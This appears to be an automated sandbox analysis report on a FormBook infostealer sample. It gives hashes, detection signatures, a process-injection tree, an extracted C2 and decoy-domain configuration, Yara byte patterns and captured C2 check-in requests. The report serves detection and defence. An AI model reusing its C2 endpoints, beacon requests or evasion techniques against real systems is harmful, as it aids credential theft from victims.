Analysis Report SX365783909782021.bat

Overview

General Information

Sample Name: SX365783909782021.bat (renamed file extension from bat to exe)
Analysis ID: 433214
MD5: ee1f4a07b874aa6ba18d6aa0f83252d3
SHA1: d17b97dc47707b685bc8976d3cbc6cdbfbd5fcee
SHA256: d66268222a39fd97e792983a3bacdb1e81067b7a28848a87fe65a5dc91f7e82a
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SX365783909782021.exe (PID: 4092 cmdline: 'C:\Users\user\Desktop\SX365783909782021.exe' MD5: EE1F4A07B874AA6BA18D6AA0F83252D3)
    • SX365783909782021.exe (PID: 5472 cmdline: 'C:\Users\user\Desktop\SX365783909782021.exe' MD5: EE1F4A07B874AA6BA18D6AA0F83252D3)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 5524 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 6124 cmdline: /c del 'C:\Users\user\Desktop\SX365783909782021.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.moneyhuntercom.info/ngvm/"], "decoy": ["justiceforashleymoore.com", "tyqbfe.com", "zydonghua.com", "crossfootwear.com", "mysticlight-shop.com", "digitaldefenseacademy.com", "joyfulgoodies.com", "blog-kotori-haru.com", "atelierlinneakunstoghelse.com", "destinyonlineacademy.com", "series.onl", "bellizzo.com", "totalscalpsolutions.com", "musicrowstudiorecording.com", "digitalgamerentals.com", "princecreativehk.com", "bitchesofzion.com", "imodalmarine.com", "chilly-sauce.com", "studionikolla.com", "jilluonlinemart.com", "ypoinc.com", "chothuenhaxuongtphcm.com", "gadamagado.com", "cartscroll.com", "congying1688.com", "fesdimac.com", "xn--rhqu70hdoa298e.com", "zkdxin168.com", "the-plague-doctor.com", "speakeroo.online", "urban-xr.com", "kanjani8-house.com", "alberaber.com", "eamm-eg.com", "alsawtisrael.com", "deathvalleysolar.com", "vuyo.club", "zcoatux.icu", "marksfly.com", "advertisershopper.com", "hashratelab.com", "broadesys.com", "sampoelstra.com", "poacolors.com", "sciencelogicandfaith.com", "bootupcertificatemount.xyz", "alotranscend.com", "steadwaybytriarc.com", "simplefinest.com", "adinaroseyoga.com", "btb659.com", "ecftech.com", "caravansforsalenorthwales.com", "e1536.com", "sellmyhouseolympia.com", "vacalinda.com", "truegemsproperty.com", "aeternusprofero.com", "djspencer.com", "zhubviz.online", "xn--r2bnc0b.com", "luisxe.info", "servicesbackyard.com"]}

Yara Overview

Memory Dumps

Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 2.2.SX365783909782021.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.SX365783909782021.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 2.2.SX365783909782021.exe.400000.0.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Strings:
  • 0x17619:$sqlite3step: 68 34 1C 7B E1
  • 0x1772c:$sqlite3step: 68 34 1C 7B E1
  • 0x17648:$sqlite3text: 68 38 2A 90 C5
  • 0x1776d:$sqlite3text: 68 38 2A 90 C5
  • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.moneyhuntercom.info/ngvm/"], "decoy": ["justiceforashleymoore.com", "tyqbfe.com", "zydonghua.com", "crossfootwear.com", "mysticlight-shop.com", "digitaldefenseacademy.com", "joyfulgoodies.com", "blog-kotori-haru.com", "atelierlinneakunstoghelse.com", "destinyonlineacademy.com", "series.onl", "bellizzo.com", "totalscalpsolutions.com", "musicrowstudiorecording.com", "digitalgamerentals.com", "princecreativehk.com", "bitchesofzion.com", "imodalmarine.com", "chilly-sauce.com", "studionikolla.com", "jilluonlinemart.com", "ypoinc.com", "chothuenhaxuongtphcm.com", "gadamagado.com", "cartscroll.com", "congying1688.com", "fesdimac.com", "xn--rhqu70hdoa298e.com", "zkdxin168.com", "the-plague-doctor.com", "speakeroo.online", "urban-xr.com", "kanjani8-house.com", "alberaber.com", "eamm-eg.com", "alsawtisrael.com", "deathvalleysolar.com", "vuyo.club", "zcoatux.icu", "marksfly.com", "advertisershopper.com", "hashratelab.com", "broadesys.com", "sampoelstra.com", "poacolors.com", "sciencelogicandfaith.com", "bootupcertificatemount.xyz", "alotranscend.com", "steadwaybytriarc.com", "simplefinest.com", "adinaroseyoga.com", "btb659.com", "ecftech.com", "caravansforsalenorthwales.com", "e1536.com", "sellmyhouseolympia.com", "vacalinda.com", "truegemsproperty.com", "aeternusprofero.com", "djspencer.com", "zhubviz.online", "xn--r2bnc0b.com", "luisxe.info", "servicesbackyard.com"]}
Multi AV Scanner detection for submitted file
Source: SX365783909782021.exe | Virustotal: Detection: 31%
Source: SX365783909782021.exe | ReversingLabs: Detection: 39%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: SX365783909782021.exe | Joe Sandbox ML: detected
Source: 2.2.SX365783909782021.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.help.exe.3b2f834.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.SX365783909782021.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.help.exe.d3d870.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.SX365783909782021.exe.22b0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: SX365783909782021.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: SX365783909782021.exe, 00000000.00000003.209611066.0000000009B30000.00000004.00000001.sdmp, SX365783909782021.exe, 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, help.exe, 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: SX365783909782021.exe, help.exe
Source: Binary string: help.pdbGCTL source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp
Source: Binary string: help.pdb source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 168.235.88.209:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 168.235.88.209:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 168.235.88.209:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.moneyhuntercom.info/ngvm/
Source: global traffic | HTTP traffic detected: GET /ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 HTTP/1.1 | Host: www.vacalinda.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 HTTP/1.1 | Host: www.servicesbackyard.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 HTTP/1.1 | Host: www.djspencer.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 HTTP/1.1 | Host: www.caravansforsalenorthwales.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 168.235.88.209 168.235.88.209
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: global traffic | HTTP traffic detected: GET /ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 HTTP/1.1 | Host: www.vacalinda.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 HTTP/1.1 | Host: www.servicesbackyard.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 HTTP/1.1 | Host: www.djspencer.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 HTTP/1.1 | Host: www.caravansforsalenorthwales.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.vacalinda.com
Source: explorer.exe, 00000003.00000000.227112576.0000000008A06000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: SX365783909782021.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SX365783909782021.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_0041A060 NtClose,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_0041A110 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00419F30 NtCreateFile,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00419FE0 NtReadFile,
